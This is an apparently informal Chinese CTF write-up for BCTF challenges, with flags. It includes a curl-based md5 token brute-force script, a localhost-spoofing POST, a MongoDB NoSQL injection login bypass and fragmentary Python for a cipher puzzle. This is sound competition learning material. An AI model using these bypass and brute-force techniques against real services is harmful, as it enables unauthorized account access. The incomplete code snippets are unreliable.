这次拉票去了,只做了三道简单的题,明天平台开放继续学习
我是后面比赛完才来做的题,可能flag跟大家不一样哈
暂时先做这些,最近有点其他事情orz
MISC
初来乍到:100
送分题
关注百度bctf,她关注你后,看她公司信息
WEB
分分钟而已:100
提交id为md5加密的结果,将md5解出如下:
e958c26cb69fb763faeb2849076d78f4 H.shao478
20e8c6b8771ed6f565e6c251b319519a Angelia689
07b5511fb9e036990211eff978b1ee16 Lamos508
8d44a8f03ab5f71ce78ae14509a03453 Ray300
每个登录id的token为md5加密,解密之后,是id+数字(3位),猜测Alice的也是这种格式
#!/bin/bash
#script:web100.sh
#usage:web100.sh
for num in {100..999}
do
id_md5=`echo -n Alice$num | md5`
res=`curl -s 'http://218.2.197.237:8081/472644703485f950e3b746f2e3818f49/index.php?id='$id_md5 | grep 'Hi! '`
if [ $? -eq 0 ]
then
echo 'md5(Alice'$num')='$id_md5
echo $res
exit
fi
done
$ bash web100.sh
md5(Alice478)=d482f2fc6b29a4605472369baf8b3c47
<br />Hi! Alice<br />Personal Information:d4b2758da0205c1e0aa9512cd188002a.php
http://218.2.197.237:8081/472644703485f950e3b746f2e3818f49/d4b2758da0205c1e0aa9512cd188002a.php
backtrack5桌面图,源代码提示
POST:key=the quieter you become the more you are able to hear
response 301 Moved Permanently
源代码里面多了flag-in-config.php.bak
但是打开文件是个字符做的鬼脸,于是访问config.php.bak试试
文件内容是一串:[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])……
扔浏览器console里面回车,结果就粗来了
真假难辨:200
tips:You must login at host computer
POST: ip=127.0.0.1
要验证账号密码,尝试admin、admin进入之后是个游戏
肿么这么血腥,讨厌捏!
调试js,initialize:function()、update:function(duration)位置断下来,
将update函数后面的,代码稍微改下
if(!cnGame.collision.col_Between_Rects(this.player.getRect(),this.end.getRect())){
if(this.deadghost != 10){
this.key = authnum(this.key, 10);
改好,运行起来
弹出框 The Key is:BCTF{2097959%2400|abcdefgabc}
见缝插针:300(未完)
源代码提示,有个备份文件,其中有部分提交处理过程的代码
if(strlen($key) != 15){}
$regex = "/[\w]{0,4}.[\W\d]{0,4}[A-F]{2}[\W\d]{2}[\d]{0,4}/i";
if(preg_match($regex, $key)){}
//于是key=aaaax1111AA!!11
未完
冰山一角:400(未完)
提示是SQLi,朋友说扫端口可以发现mongodb服务,可是我去扫的时候,端口已经不对外开放了。
综合这些提示,大概是mongodb SQLi
POST: user[$ne]=admin&pwd[$ne]=admin&Submit=Submit
返回页面上有提示you_guys_fxxking_smart.php/jpg
PPC & CRYPTO
混沌密码锁:100
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#script:encode.py
#usage:encode.py
def main():
funx='1345789'
funy=[ a+b+c+d for a in funx for b in funx for c in funx for d in funx ]
for fun_s in funy:
f1='fun'+fun_s[0]
f2='fun'+fun_s[1]
f3='fun'+fun_s[2]
f4='fun'+fun_s[3]
try:
answer_hash = f['fun6'](f['fun2'](f[f1](f[f2](f[f3](f[f4](answer))))))
print f1,f2,f3,f4
print answer_hash
except:
continue
$ python encode.py
fun3 fun5 fun1 fun4
我在想你在想我什么的用谷歌翻译肯定一点不好用还是别用了看这句话纠结死你觉得呢#answer_hash=user_hash
#接着解出user
def main():
f1='fun3'
f2='fun5'
f3='fun1'
f4='fun4'
userhash='我在想你在想我什么的用谷歌翻译肯定一点不好用还是别用了看这句话纠结死你觉得呢'
ans_hash = zlib.decompress(binascii.unhexlify(reverse(dec2hex(answer))))
user = hex2dec(reverse(binascii.hexlify(zlib.compress(ans_hash,1))))
print user
$ python decode.py
78864179732635837913920409948348078659913609452869425042153399132863903834522365250250429645163517228356622776978637910679538418927909881502654275707069810737850807610916192563069593664094605159740448670132065615956224727012954218390602806577537456281222779015
$nc 218.2.197.242 9991
#BCTF{py7h0n-l1b-func7i0ns-re4lly-str4nge}
他乡遇故知: 200(未完)
http://www.matrix67.com/blog/archives/301
LOL,I think they
